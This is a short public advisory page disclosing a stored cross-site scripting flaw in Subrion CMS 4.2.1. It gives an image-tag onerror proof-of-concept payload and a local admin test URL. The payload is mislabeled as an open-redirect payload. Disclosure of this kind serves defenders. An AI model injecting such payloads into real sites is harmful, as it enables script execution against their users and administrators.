Subrion CMS 4.2.1 Cross Site Scripting

2018.07.08

Credit: Ismail Tasdelen

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: [ Stored XSS at Subrion CMS 4.2.1 ]
# Date: [ 06.06.2018 ]
# Exploit Author: [ Ismail Tasdelen ]
# Vendor Homepage: [ https://intelliants.com/ ]
# Software : [ Subrion CMS ]
# Software Version : [ 4.2.1 ]
# Vulnerability : Stored XSS
# Open Redirect Payload : "><img src=x onerror=alert('ismailtasdelen')>
# Type: Webapps
# PoC Video : https://www.youtube.com/watch?v=MQaEnbGwADc
# Test on : Kali Linux - Google Chrome / Mozilla FireFox -- Last Version
http://localhost/?demo-core&admin=1
# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Subrion CMS 4.2.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.